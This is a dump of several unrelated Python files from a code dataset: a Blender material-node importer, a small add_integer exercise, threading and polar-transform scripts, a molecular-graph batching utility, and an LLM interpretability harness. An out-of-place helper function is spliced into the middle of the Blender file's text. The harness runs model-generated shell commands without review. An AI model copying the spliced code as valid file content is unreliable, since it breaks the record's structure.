tex_type, tex_path in mat_data['Samplers'].items():\n img = None\n if tex_type == DIFFUSE:\n # texture\n _path = realize_path(tex_path, local_root_directory)\n if _path is not None and op.exists(_path):\n img = bpy.data.images.load(_path)\n diffuse_texture = nodes.new(type='ShaderNodeTexImage')\n diffuse_texture.name = diffuse_texture.label = 'Texture Image - Diffuse' # noqa\n diffuse_texture.image = img\n diffuse_texture.location = (-600, 300)\n lColourVec4 = diffuse_texture.outputs['Color']\n if 15 in mat_data['Flags']:\n # #ifdef _F16_DIFFUSE2MAP\n if 16 not in mat_data['Flags']:\n # #ifndef _F17_MULTIPLYDIFFUSE2MAP\n diffuse2_path = realize_path(\n mat_data['Samplers'][DIFFUSE2], local_root_directory)\n if op.exists(diffuse2_path):\n img = bpy.data.images.load(diffuse2_path)\n diffuse2_texture = nodes.new(type='ShaderNodeTexImage')\n diffuse2_texture.name = diffuse_texture.label = 'Texture Image - Diffuse2' # noqa\n diffuse2_texture.image = img\n diffuse2_texture.location = (-400, 300)\n mix_diffuse = nodes.new(type='ShaderNodeMixRGB')\n mix_diffuse.location = (-200, 300)\n links.new(mix_diffuse.inputs['Color1'],\n lColourVec4)\n links.new(mix_diffuse.inputs['Color2'],\n diffuse2_texture.outputs['Color'])\n links.new(mix_diffuse.inputs['Fac'],\n diffuse2_texture.outputs['Alpha'])\n lColourVec4 = mix_diffuse.outputs['Color']\n else:\n print('Note: Please post on discord the model you are'\n ' importing so I can fix this!!!')\n # #ifndef _F44_IMPOSTER\n if 43 not in mat_data['Flags']:\n # #ifdef _F39_METALLIC_MASK\n if 38 in mat_data['Flags']:\n links.new(principled_BSDF.inputs['Metallic'],\n diffuse_texture.outputs['Alpha'])\n else:\n # use the default value from the file\n if 'gMaterialParamsVec4' in uniforms:\n principled_BSDF.inputs['Metallic'].default_value = uniforms['gMaterialParamsVec4'][2] # noqa\n elif tex_type == MASKS:\n # texture\n _path = realize_path(tex_path, local_root_directory)\n if _path is not None and op.exists(_path):\n img = bpy.data.images.load(_path)\n img.colorspace_settings.name = 'XYZ'\n mask_texture = nodes.new(type='ShaderNodeTexImage')\n mask_texture.name = mask_texture.label = 'Texture Image - Mask'\n mask_texture.image = img\n mask_texture.location = (-700, 0)\n lfRoughness = None\n # RGB separation node\n separate_rgb = nodes.new(type='ShaderNodeSeparateRGB')\n separate_rgb.location = (-400, 0)\n links.new(separate_rgb.inputs['Image'],\n mask_texture.outputs['Color'])\n if 43 not in mat_data['Flags']:\n # #ifndef _F44_IMPOSTER\n if 24 in mat_data['Flags']:\n # #ifdef _F25_ROUGHNESS_MASK\n # lfRoughness = 1 - lMasks.g\n # subtract the green channel from 1:\n sub_1 = nodes.new(type=\"ShaderNodeMath\")\n sub_1.operation = 'SUBTRACT'\n sub_1.location = (-200, 0)\n sub_1.inputs[0].default_value = 1.0\n lfRoughness = sub_1.outputs['Value']\n # link them up\n links.new(sub_1.inputs[1], separate_rgb.outputs['G'])\n else:\n roughness_value = nodes.new(type='ShaderNodeValue')\n roughness_value.outputs[0].default_value = 1.0\n lfRoughness = roughness_value.outputs['Value']\n # lfRoughness *= lUniforms.mpCustomPerMaterial->gMaterialParamsVec4.x; # noqa\n mult_param_x = nodes.new(type=\"ShaderNodeMath\")\n mult_param_x.operation = 'MULTIPLY'\n mult_param_x.inputs[1].default_value = uniforms[\n 'gMaterialParamsVec4'][0]\n links.new(mult_param_x.inputs[0], lfRoughness)\n lfRoughness = mult_param_x.outputs['Value']\n if lfRoughness is not None:\n links.new(principled_BSDF.inputs['Roughness'],\n lfRoughness)\n # If the roughness wasn't ever defined then the default 
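# create_material_node in material_node.py repeats the same steps for nearly every
# node it adds: nodes.new, set .location, then wire sockets with links.new. A small
# helper in the same spirit keeps the graph construction readable; a sketch that
# assumes it runs inside Blender, where `nodes` and `links` come from a node tree:
def add_node(nodes, links, node_type, location, to_input=None, from_socket=None):
    node = nodes.new(type=node_type)
    node.location = location
    if to_input is not None and from_socket is not None:
        # same argument order the file already uses: destination input, source output
        links.new(node.inputs[to_input], from_socket)
    return node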
value is 1\n # which is what blender has as the default anyway\n\n # gMaterialParamsVec4.x\n # #ifdef _F40_SUBSURFACE_MASK\n if 39 in mat_data['Flags']:\n links.new(principled_BSDF.inputs['Subsurface'],\n separate_rgb.outputs['R'])\n if 43 in mat_data['Flags']:\n # lfMetallic = lMasks.b;\n links.new(principled_BSDF.inputs['Metallic'],\n separate_rgb.outputs['B'])\n\n elif tex_type == NORMAL:\n # texture\n _path = realize_path(tex_path, local_root_directory)\n if _path is not None and op.exists(_path):\n img = bpy.data.images.load(_path)\n img.colorspace_settings.name = 'XYZ'\n normal_texture = nodes.new(type='ShaderNodeTexImage')\n normal_texture.name = normal_texture.label = 'Texture Image - Normal' # noqa\n normal_texture.image = img\n normal_texture.location = (-700, -300)\n # separate xyz then recombine\n normal_sep_xyz = nodes.new(type='ShaderNodeSeparateXYZ')\n normal_sep_xyz.location = (-400, -300)\n normal_com_xyz = nodes.new(type='ShaderNodeCombineXYZ')\n normal_com_xyz.location = (-200, -300)\n # swap X and Y channels\n links.new(normal_com_xyz.inputs['X'],\n normal_sep_xyz.outputs['Y'])\n links.new(normal_com_xyz.inputs['Y'],\n normal_sep_xyz.outputs['X'])\n links.new(normal_com_xyz.inputs['Z'],\n normal_sep_xyz.outputs['Z'])\n\n # normal map\n normal_map = nodes.new(type='ShaderNodeNormalMap')\n normal_map.location = (0, -300)\n # link them up\n links.new(normal_sep_xyz.inputs['Vector'],\n normal_texture.outputs['Color'])\n links.new(normal_map.inputs['Color'],\n normal_com_xyz.outputs['Vector'])\n links.new(principled_BSDF.inputs['Normal'],\n normal_map.outputs['Normal'])\n\n if 42 in mat_data['Flags']:\n # lTexCoordsVec4.xy *= lUniforms.mpCustomPerMesh->gCustomParams01Vec4.z; # noqa\n normal_scale = nodes.new(type='ShaderNodeMapping')\n normal_scale.location = (-1000, -300)\n scale = uniforms['gCustomParams01Vec4'][2]\n normal_scale.inputs['Scale'].default_value = Vector((scale, scale, scale)) # noqa\n tex_coord = nodes.new(type='ShaderNodeTexCoord')\n tex_coord.location = (-1200, -300)\n tex_coord.object = bpy.context.active_object\n links.new(normal_scale.inputs['Vector'],\n tex_coord.outputs['Generated'])\n links.new(normal_texture.inputs['Vector'],\n normal_scale.outputs['Vector'])\n\n # Apply some final transforms to the data before connecting it to the\n # Material output node\n\n if 20 in mat_data['Flags'] or 28 in mat_data['Flags']:\n # #ifdef _F21_VERTEXCOLOUR\n # lColourVec4 *= IN( mColourVec4 );\n col_attribute = nodes.new(type='ShaderNodeAttribute')\n col_attribute.attribute_name = 'Col'\n mix_colour = nodes.new(type='ShaderNodeMixRGB')\n links.new(mix_colour.inputs['Color1'],\n lColourVec4)\n links.new(mix_colour.inputs['Color2'],\n col_attribute.outputs['Color'])\n links.new(principled_BSDF.inputs['Base Color'],\n mix_colour.outputs['Color'])\n lColourVec4 = mix_colour.outputs['Color']\n\n if (8 in mat_data['Flags'] or 10 in mat_data['Flags'] or\n 21 in mat_data['Flags']):\n # Handle transparency\n alpha_mix = nodes.new(type='ShaderNodeMixShader')\n alpha_shader = nodes.new(type='ShaderNodeBsdfTransparent')\n if 0 in mat_data['Flags']:\n # If there is a diffuse texture we use this to get rid of\n # transparent pixels\n discard_node = nodes.new(type=\"ShaderNodeMath\")\n discard_node.operation = 'LESS_THAN'\n discard_node.inputs[1].default_value = kfAlphaThreshold\n lColourVec4_a = diffuse_texture.outputs['Alpha']\n\n links.new(discard_node.inputs[0], lColourVec4_a)\n lColourVec4_a = discard_node.outputs['Value']\n\n if 10 in mat_data['Flags']:\n clamp_node = 
nodes.new(type='ShaderNodeClamp')\n clamp_node.clamp_type = 'RANGE'\n clamp_node.location = (500, -300)\n clamp_node.inputs['Min'].default_value = kfAlphaThreshold\n clamp_node.inputs['Max'].default_value = kfAlphaThresholdMax\n\n links.new(clamp_node.inputs['Value'], lColourVec4_a)\n lColourVec4_a = clamp_node.outputs['Result']\n\n links.new(alpha_mix.inputs['Fac'], lColourVec4_a)\n # If the material has any transparency we want to specify this in\n # the material\n mat.blend_method = 'BLEND'\n else:\n # if there isn't we will use the material colour as the base\n # colour of the transparency shader\n links.new(alpha_shader.inputs['Color'],\n lColourVec4)\n\n links.new(alpha_mix.inputs[1],\n FRAGMENT_COLOUR0)\n links.new(alpha_mix.inputs[2],\n alpha_shader.outputs['BSDF'])\n\n FRAGMENT_COLOUR0 = alpha_mix.outputs['Shader']\n\n if 50 in mat_data['Flags']:\n # #ifdef _F51_DECAL_DIFFUSE\n # FRAGMENT_COLOUR0 = vec4( lOutColours0Vec4.xyz, lColourVec4.a );\n alpha_mix_decal = nodes.new(type='ShaderNodeMixShader')\n alpha_shader = nodes.new(type='ShaderNodeBsdfTransparent')\n links.new(alpha_mix_decal.inputs['Fac'],\n diffuse_texture.outputs['Alpha'])\n links.new(alpha_mix_decal.inputs[1],\n alpha_shader.outputs['BSDF'])\n links.new(alpha_mix_decal.inputs[2],\n FRAGMENT_COLOUR0)\n FRAGMENT_COLOUR0 = alpha_mix_decal.outputs['Shader']\n\n # Link up the diffuse colour to the base colour on the prinicipled BSDF\n # shader.\n links.new(principled_BSDF.inputs['Base Color'],\n lColourVec4)\n\n # Finally, link the fragment colour to the output material.\n links.new(output_material.inputs['Surface'],\n FRAGMENT_COLOUR0)\n\n # link some nodes up according to the uberfragment.bin shader\n # TODO: fix this at some point...\n # https://blender.stackexchange.com/questions/21533/totally-white-shadeless-material-in-cycles\n # if 6 in mat_data['Flags']:\n # mat.use_shadeless = True\n\n return mat\n","repo_name":"monkeyman192/NMSDK","sub_path":"NMS/material_node.py","file_name":"material_node.py","file_ext":"py","file_size_in_byte":14141,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"7"} +{"seq_id":"29981582435","text":"#!/usr/bin/python3\n\"\"\"add_integer function returns the sum of two integers\n\nworks for two integers\n>>> add_integer(2, 2)\n4\n\"\"\"\n\n\ndef add_integer(a, b=98):\n \"\"\"returns sum of two intergers\n numbers must be casted to integers before adding\n\n >>> add_integer(-1, -2)\n -3\n \"\"\"\n max_float_num = 3.402823466e+38\n min_float_num = 1.175494351e-38\n\n if not isinstance(a, (int, float)):\n raise TypeError('a must be an integer')\n if not isinstance(b, (int, float)):\n raise TypeError('b must be an integer')\n\n if (a > max_float_num):\n raise TypeError(\"a must be an integer\")\n if (b > max_float_num):\n raise TypeError(\"b must be an integer\")\n\n if isinstance(a, float):\n a = int(a)\n if isinstance(b, float):\n b = int(b)\n\n return a + b\n","repo_name":"elnino10/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/0-add_integer.py","file_name":"0-add_integer.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1174773187","text":"import threading\nimport time\nfrom QM_se import get_info\n\n\nexitFlag = 0\n\n\nclass myThread(threading.Thread):\n def __init__(self, threadID, name, counter):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.counter = counter\n\n def 
run(self): # Put what you want to run here\n print(\"Starting \" + self.name)\n get_info(self.name)\n # sleep minutes\n sleep_minutes = 60\n for i in range(sleep_minutes):\n time.sleep(60)\n print(\"Exiting \" + self.name)\n\n\ndef print_time(threadName, delay, counter):\n while counter:\n if exitFlag:\n (threading.Thread).exit()\n time.sleep(delay)\n print(\"%s: %s\" % (threadName, time.ctime(time.time())))\n counter -= 1","repo_name":"GaryBall1997/STATS101B_data_collection","sub_path":"thread_class.py","file_name":"thread_class.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36885198440","text":"# some code parts are based on the functions provided by the repo:\n# https://github.com/d3n7/GPT-4-Unlimited-Tools\n\nimport argparse\n# import openai\nimport regex\nimport re\nimport pandas as pd\nimport subprocess\nfrom getpass import getpass\nimport pandas as pd\nimport os\nfrom tqdm import tqdm\nimport time\nfrom random import random, uniform\nimport random as rd\nimport torch.nn as nn\nimport json\nimport warnings\nimport numpy as np\nfrom call_interpreter import ask_model\nrd.seed(0000)\n\nparser = argparse.ArgumentParser(description='Process Arguments')\t\nparser.add_argument('--model', type=str, default='gpt-4', help='model name')\t\nparser.add_argument('--func_category', type=str, default='numeric', help='function category')\t\nparser.add_argument('--debug', action='store_true', help='debug mode, print dialogues to screan', default=False)\nparser.add_argument('--dataset_path', type=str, default='./results/', help='a path to save the model outputs')\t\nparser.add_argument('--function_path', type=str, default='../find_dataset/', help='path to the gt functions')\t\nparser.add_argument('--temp_function_path', type=str, default='./temp/', help='path to copy the gt functions')\t\nparser.add_argument('--prompt_path', type=str, default='./prompts/numeric.txt', help='path to prompt to use')\t\nparser.add_argument('--n_func', type=int, default=5, help='specify the amount of functions to run')\t\nparser.add_argument('--vicuna_server', type=str, help='specify vicuna server address')\t\nparser.add_argument('--vicuna_server_module', type=str, help='specify vicuna server address for the backbone model')\t\nparser.add_argument('--llama_hf_path', type=str, help='specify llama path')\t\nparser.add_argument('--hints', action='store_true', help='add_search_initializations', default=False)\nparser.add_argument('--single_round', action='store_true', help='add_search_initializations', default=False)\nargs = parser.parse_args()\n\nregx = [r\"([A-Z]+\\(((?:[^()\\\"']|(?:\\\"[^\\\"]*\\\")|(?:'[^']*')|\\((?1)*\\))*)\\))\",\n r'''(?:\"(?:[^\"\\\\]|\\\\.)*\"|'(?:[^'\\\\]|\\\\.)*'|\\b[^,]+)''']\n\nvicuna_server = args.vicuna_server\nvicuna_server_module = args.vicuna_server_module\n\nclass SessionState:\n def __init__(self):\n self.running = False\n self.followup = False\n self.prompt = ''\n self.command = ''\n self.acceptreject = False\n self.history = []\n self.totalCost = 0\n self.displayChat = False\n self.displayCost = False\n\nnewSession = True\nmanualApproval = False\n\ndef followup(state):\n state.followup, state.running = True, True\n\ndef formatTable(table):\n lines = ''\n for x, i in enumerate(table['GPT Commands']):\n lines += '{} - {}\\n'.format(table['GPT Commands'][x],table['GPT Explanations'][x])\n return(lines)\n\ndef formatTable_CommandOnly(table):\n lines = ''\n for x, i in 
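# The first pattern in `regx` above depends on the third-party `regex` module rather
# than the stdlib `re`: the (?1) construct recursively re-enters capture group 1, so
# the match balances nested parentheses inside a COMMAND call. A short demonstration:
import regex

pattern = r"([A-Z]+\(((?:[^()\"']|(?:\"[^\"]*\")|(?:'[^']*')|\((?1)*\))*)\))"
text = 'Sure. COMMAND: PYTHON("function.py") plus trailing prose'
print(regex.findall(pattern, text)[0][0])  # prints PYTHON("function.py")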
enumerate(table['GPT Commands']):\n lines += '{} - {}\\n'.format(table['GPT Commands'][x],table['GPT Explanations'][x])\n return(lines)\n\ncommandTable = pd.DataFrame({\n 'GPT Commands': ['PYTHON(function.py)'],\n 'GPT Explanations': ['Run a python script with the given file name. Use quotes for the filename argument. Do not use quotes in the function command itself.'],\n 'Raw Translation': ['python {}']\n})\n\n# return the prompt according to the task\ndef return_sysPrompt(model):\n if model in ['llama-2']:\n sysPrompt = 'You now have the ability to execute commands to run external functions. ' \\\n 'You are able to access the user\\'s machine with these commands. In every message you send, ' \\\n 'include \"COMMAND: \" with your command at the end. Here is a list of commands with ' \\\n 'explanations of how they are used:\\n{}\\nWhen you use a command, the user will respond ' \\\n 'with \"Response: \" followed by the output of the commmand. Use this output to help the ' \\\n 'user complete their request. After you receive a task from the user, you must execute {} ' \\\n 'to run the external function. You will then receive outputs from the external function to ' \\\n 'analyze. You must only analyze outputs produced by the function when you run {}. Do not run ' \\\n 'the function any other way. Do not analyze any other outputs besides the ones produced by running {}.'\n else:\n sysPrompt = 'You now have access to some commands to help complete the user\\'s request. ' \\\n 'You are able to access the user\\'s machine with these commands. In every message you send, ' \\\n 'include \"COMMAND: \" with your command at the end. Here is a list of commands with ' \\\n 'explanations of how they are used:\\n{}\\nWhen you use a command, the user will respond ' \\\n 'with \"Response: \" followed by the output of the commmand. Use this output to help the ' \\\n 'user complete their request.' 
\n return sysPrompt\n\ndef runCmd(flag,state):\n if flag:\n try:\n p = subprocess.Popen(state.command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n output, errors = p.communicate()\n state.prompt = 'Response: ' + output.decode(\"utf-8\")\n # if errors:\n # state.prompt += 'Error occurred, please try again (some of the input values might be undefined)'\n # state.prompt += 'Errors: ' + errors.decode(\"utf-8\")\n except subprocess.CalledProcessError as e:\n print('!!!ERROR!!!')\n print(e)\n # state.prompt = 'Response: ' + e.output.decode(\"utf-8\")\n else:\n state.prompt = \"Response: User rejected this command\"\n followup(state)\n\ndef define_prompt(prompt_template,dir2func):\n prompt = prompt_template.format(DIR2FUNC=os.path.join(dir2func))\n return prompt\n\ndef save_description(response, filepath):\n description = response.rsplit('[DESCRIPTION]: ')[-1]\n description = description.rsplit('[DOMAIN]: ')[0]\n description = description.rsplit('[CODE]: ')[0]\n with open(filepath,'w') as f:\n f.write(description) \n f.close() \n\ndef save_domain(response,filepath):\n domain = response.rsplit('[DOMAIN]: ')[-1]\n domain = domain.rsplit('[CODE]: ')[0]\n with open(filepath,'w') as f:\n f.write(domain) \n f.close()\n\ndef save_code(response,filepath):\n code = response.rsplit('[CODE]:')[-1]\n if code.find('```python') != -1:\n code = code.rsplit('```python')[-1]\n code = code.rsplit('```')[0]\n elif code.find('``` python') != -1:\n code = code.rsplit('``` python')[-1]\n code = code.rsplit('```')[0]\n elif code.find('```') != -1:\n code = code.rsplit('```',maxsplit=2)[1]\n else:\n code = ''\n \n with open(filepath,'w') as f:\n f.write(code) \n f.close()\n\ndef save_fullhistory(history,filepath):\n with open(filepath+'.txt', 'a') as f:\n for i in history:\n if i['role'] == 'user':\n f.write('\\nuser:\\n'+i['content'])\n elif i['role'] == 'assistant':\n f.write('\\nassistant:\\n'+i['content'])\n with open(filepath+'.json', 'w') as file:\n json.dump(history, file)\n f.close()\n\n\ndef interp_func(prompt,model,debug=False, single_round=False):\n state = SessionState()\n sysPrompt = return_sysPrompt(model)\n round_count = 0\n while True:\n state.running = True\n if state.running:\n state.running = False \n if not state.followup:\n state.prompt = prompt\n if (newSession or state.history == []) and (not state.followup):\n if 'llama' in model:\n state.history = [{'role': 'system', 'content': sysPrompt.format(formatTable(commandTable),formatTable_CommandOnly(commandTable),formatTable_CommandOnly(commandTable),formatTable_CommandOnly(commandTable))}]\n else:\n state.history = [{'role': 'system', 'content': sysPrompt.format(formatTable(commandTable))}]\n else:\n if 'llama' in model:\n state.history[0] = {'role': 'system', 'content': sysPrompt.format(formatTable(commandTable),formatTable_CommandOnly(commandTable),formatTable_CommandOnly(commandTable),formatTable_CommandOnly(commandTable))}\n else:\n state.history[0] = {'role': 'system', 'content': sysPrompt.format(formatTable(commandTable))}\n state.followup = False \n response,state = ask_model(state.prompt, model, state, vicuna_server)\n if len(regex.findall(regx[0], response)) >= 1:\n cmd = regex.findall(regx[0], response)[0][0]\n pIndex = cmd.index('(')\n stem = cmd[:pIndex]\n rawArgs = cmd[pIndex+1:][:-1]\n cmdId = -1\n\n for x, i in enumerate(commandTable['GPT Commands']):\n if stem in i:\n cmdId = x\n break\n\n rawArgs.replace('\\n', '\\\\n')\n rawArgs.replace('\\\\\\n', '\\\\n')\n if cmdId == -1:\n state.prompt = 'Response: Unrecognized 
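# runCmd above shells out with subprocess.Popen plus communicate() and decodes the
# streams by hand. On Python 3.7+, subprocess.run covers the same ground in one call;
# a sketch of the equivalent capture (the command string is illustrative):
import subprocess

result = subprocess.run('python function.py', shell=True,
                        capture_output=True, text=True)
prompt = 'Response: ' + result.stdout
if result.returncode != 0:
    prompt += 'Errors: ' + result.stderr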
command'\n followup(state)\n elif \"'''\" in rawArgs:\n state.prompt = 'Response: Error parsing multi-line string (\\'\\'\\') Use a single line with escaped newlines instead (\")'\n followup(state)\n elif '\"\"\"' in rawArgs:\n state.prompt = 'Response: Error parsing multi-line string (\\\"\\\"\\\") Use a single line with escaped newlines instead (\")'\n followup(state)\n else:\n state.command = commandTable['Raw Translation'][cmdId]\n args = []\n if rawArgs != '':\n args = re.findall(regx[1], rawArgs) #[rawArgs]\n state.command = state.command.format(*args)\n\n singleQuotes = False\n for i in args:\n if i.startswith(\"'\"):\n singleQuotes = True\n state.prompt = \"Response: Error parsing argument in single quotes. Use double quotes around the argument instead\"\n followup(state)\n break\n\n if not singleQuotes:\n if manualApproval:\n state.acceptreject = False\n else:\n runCmd(1,state)\n\n round_count+=1\n \n if state.acceptreject:\n print('GPT is trying to run the following command: ' + state.command + '\\nPlease accept or reject this request.')\n decision = input('Accept or Reject [Accept, Reject]:')\n if decision.lower() == 'accept':\n state.acceptreject = False\n runCmd(1,state)\n elif decision.lower() == 'reject':\n state.acceptreject = False\n runCmd(0,state)\n\n \n if \"[DESCRIPTION]\" in response or (single_round and round_count==2):\n if debug:\n print(response) \n return(response,state.history) \n\n if round_count>20:\n # raise Warning(\"Interpretation process exceeded 100 rounds\")\n return('','') \n\n if debug:\n print(response) \n print(state.prompt) \n \ndef copy_func(source,target,category,vicuna_server_module=None,llama_hf_path=None):\n func_name = 'function_code.py'\n if 'numeric' in args.func_category:\n if os.path.exists(f'{source}/mlp_approx_model.pt'):\n os.system(f'scp {source}/mlp_approx_model.pt {target}/mlp_approx_model.pt')\n if ('neurons_entities' in category) or ('neurons_relations' in category):\n temp = open(f'{source}/{func_name}','r').read()\n temp = temp.replace('{API_BASE}',f\"'{vicuna_server_module}'\")\n temp = temp.replace('{LLAMA_PATH}',f\"'{llama_hf_path}'\")\n open(target+'/function.py','w').write(temp)\n else:\n os.system(f'scp {source}/{func_name} {target}/function.py')\n return\n\n\ndef remove_func(target):\n os.system(f'rm {target}')\n\ndef remove_temp_folder(target):\n os.system(f'rm -r {target}')\n\n\ndef main(args):\n with open(args.prompt_path,'r') as f:\n prompt_template = f.read()\n # os.mkdir(os.path.join(args.dataset_path,args.model,args.func_category))\n t_start = time.time()\n count = 0 \n remove_temp_folder(args.temp_function_path)\n os.makedirs(args.temp_function_path, exist_ok=True)\n for function in tqdm(os.listdir(args.function_path+args.func_category)): \n print(function)\n if count >= args.n_func: break\n if not os.path.os.path.exists(os.path.join(args.function_path,args.func_category,function,'function_code.py')): continue\n path2save = os.path.join(args.dataset_path,args.model,args.func_category,function)\n if args.hints:\n path2save = os.path.join(args.dataset_path,args.model,args.func_category+'_hints',function)\n if args.single_round:\n path2save = os.path.join(args.dataset_path,args.model,args.func_category+'_single_round',function)\n if os.path.exists(path2save+'/description.txt'): continue\n if os.path.isfile(path2save): continue\n \n os.makedirs(path2save, exist_ok=True)\n mlp_flag = False\n if 'numeric' in args.func_category:\n if int(function[1:]) < 150:\n mlp_flag = True\n 
copy_func(source=os.path.join(args.function_path,args.func_category,function),target=args.temp_function_path,category=args.func_category,vicuna_server_module=args.vicuna_server_module,llama_hf_path=args.llama_hf_path)\n prompt = define_prompt(prompt_template,args.temp_function_path+'function.py')\n if args.hints:\n initial = open(os.path.join(args.function_path,args.func_category,function,'initial.json'),'r').read()\n prompt += f'\\nWe advise you to start with the following words: {initial}'\n if args.single_round:\n initial = open(os.path.join(args.function_path,args.func_category,function,'initial.json'),'r').read()\n prompt += f'\\nWe advise you to start with the following words: {initial}'\n if mlp_flag:\n prompt_path_mlp = args.prompt_path.replace('numeric','numeric_mlp')\n with open(prompt_path_mlp,'r') as f:\n prompt_template_mlp = f.read()\n prompt = define_prompt(prompt_template_mlp,args.temp_function_path+'function.py')\n if args.debug:\n print(prompt)\n interp_count = 0\n while True:\n try:\n interp_count+=1\n response,history = interp_func(prompt,args.model,args.debug, args.single_round)\n break\n except Exception as e:\n print(e)\n if interp_count>5:\n break\n save_fullhistory(history,path2save+'/history')\n save_description(response,path2save+'/description.txt')\n if ('numeric' in args.func_category) or ('neurons' in args.func_category):\n save_domain(response,path2save+'/domain.txt')\n if 'numeric' in args.func_category or ('strings' in args.func_category):\n save_code(response,path2save+'/code.py')\n if mlp_flag:\n os.system(f'rm {args.temp_function_path}/mlp_approx_model.pt')\n remove_func(args.temp_function_path+'function.py')\n count+=1\n \n t_end = time.time()\n print(f'total time for {count} functions: {t_end-t_start}')\n remove_temp_folder(args.temp_function_path)\n\nif __name__ == '__main__':\n main(args)\n\n\n\n","repo_name":"multimodal-interpretability/FIND","sub_path":"src/run_interpretations/collect_interpretations.py","file_name":"collect_interpretations.py","file_ext":"py","file_size_in_byte":15683,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"7"} +{"seq_id":"40662466849","text":"import tensorflow as tf\n\n# In the batch process, the data set is divided into parts according to the value determined as the batch value\n# and the training of the model is carried out on this part in each iteration.\ndef prepare_batch(x_batch, y_batch):\n \n atom_features, bond_features, pair_indices = x_batch\n\n num_atoms = atom_features.row_lengths()\n num_bonds = bond_features.row_lengths()\n\n molecule_indices = tf.range(len(num_atoms))\n molecule_indicator = tf.repeat(molecule_indices, num_atoms)\n\n\n \n gather_indices = tf.repeat(molecule_indices[:-1], num_bonds[1:])\n increment = tf.cumsum(num_atoms[:-1])\n increment = tf.pad(tf.gather(increment, gather_indices), [(num_bonds[0], 0)])\n pair_indices = pair_indices.merge_dims(outer_axis=0, inner_axis=1).to_tensor()\n pair_indices = pair_indices + increment[:, tf.newaxis]\n atom_features = atom_features.merge_dims(outer_axis=0, inner_axis=1).to_tensor()\n bond_features = bond_features.merge_dims(outer_axis=0, inner_axis=1).to_tensor()\n\n\n return (atom_features, bond_features, pair_indices, molecule_indicator), y_batch\n\n# Now, we pass the function defined above to the map() function in the return statement of the function below\n# similar to the decorator design pattern here, so that the X, y parameters are passed to the prepare_batch() function. 
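# Why prepare_batch below offsets pair_indices: batching concatenates the atoms of
# every molecule, so bond endpoints stored relative to "atom 0 of this molecule"
# must be shifted by the number of atoms that precede it, which is what the
# tf.cumsum/tf.gather increment computes. The same idea in a two-graph numpy toy:
import numpy as np

num_atoms = np.array([3, 2])          # molecule A has 3 atoms, molecule B has 2
pairs_b = np.array([[0, 1], [1, 0]])  # molecule B's bonds, atom ids local to B
offset = np.cumsum(num_atoms)[:-1]    # atoms preceding each later molecule -> [3]
print(pairs_b + offset[0])            # [[3 4] [4 3]]: ids now valid in the batch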
\n# The resulting dataset can then be fed directly into Keras training and evaluation loops.\ndef MPNNDataset(X, y, batch_size=32, shuffle=False):\n dataset = tf.data.Dataset.from_tensor_slices((X, (y)))\n if shuffle:\n dataset = dataset.shuffle(1024)\n return dataset.batch(batch_size).map(prepare_batch, -1).prefetch(-1)","repo_name":"McahitKutsal/covid-19-drug-interaction-paper","sub_path":"data/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"7496006878","text":"# Script to transform an image to polar coordinates\n# Only run from PCs\nimport argparse\nimport cv2\nimport numpy as np\nfrom classes.emulate import *\n\n# Cut image to square\ndef square_img(img):\n\tw,h = img.shape[0],img.shape[1]\n\tnew_half = int(max(w,h)/2)\n\ttemp_img = np.zeros((2*new_half,2*new_half,3))\n\ttemp_img[new_half-int(w/2):new_half+int(w/2),new_half-int(h/2):new_half+int(h/2),:] = img[:2*int(w/2),:2*int(h/2)]\n\treturn temp_img\n\ndef cart2polar(image_path, output_path):\n\n\t# read image from image_path and cut image to square\n\tsource = cv2.imread(image_path)\n\timg = source.astype(np.float32)\n\timg = square_img(img)\n\n\t# Polarize image\n\tradius = np.sqrt(((img.shape[0]/2.0)**2.0)+((img.shape[1]/2.0)**2.0))\n\tpolar_image = cv2.linearPolar(img,(img.shape[0]/2, img.shape[1]/2), radius, cv2.WARP_FILL_OUTLIERS)\n\n\t# write image\n\tcv2.imwrite(output_path, polar_image)\n\t\n\treturn img, polar_image\n\nif __name__ == '__main__':\n\tfrom run_emulate import *\n\t\n\t# Arguments\n\targs = argparse.ArgumentParser(description=\"Image input and output\")\n\targs.add_argument('-i','--input', default='1.jpg', type=str, help='Input image path to be transformed')\n\targs.add_argument('-o','--output', default='transform_1.jpg', type=str, help='Transformed image path to output')\n\targs = args.parse_args()\n\n\toriginal_img, polar_image = cart2polar('images/'+args.input, 'images/'+args.output)","repo_name":"reggiehsu111/led_strip","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42668068978","text":"\"\"\"CS 108 Lab 5.0\n\nThis application takes two user input integers and, starting from the\nfirst integer, prints every 10th value that is less than or equal to\nthe second integer.\n\n@author: Sam Hoogewind (sth6)\n@date: Fall, 2020\n\"\"\"\n\n# Prompt the user for 2 integers\nnum1 = int(input())\nnum2 = int(input())\n\n# Print every increment of 10 in the range of the first integer\n# to the second\nif num1 <= num2:\n for x in range(num1, num2 + 1, 10):\n print(x)\n\n# If the first integer is bigger, print an error\nelse:\n print(\"Second integer can't be less than the first.\")\n ","repo_name":"samhoog/cs108","sub_path":"lab5/range_practice.py","file_name":"range_practice.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1516621133","text":"from collections import Counter\na='''0: 3\n1: 2\n2: 4\n4: 4\n6: 5\n8: 6\n10: 8\n12: 8\n14: 6\n16: 6\n18: 8\n20: 8\n22: 6\n24: 12\n26: 9\n28: 12\n30: 8\n32: 14\n34: 12\n36: 8\n38: 14\n40: 12\n42: 12\n44: 12\n46: 14\n48: 12\n50: 14\n52: 12\n54: 10\n56: 14\n58: 12\n60: 14\n62: 14\n66: 10\n68: 14\n74: 14\n76: 12\n78: 14\n80: 20\n86: 18\n92: 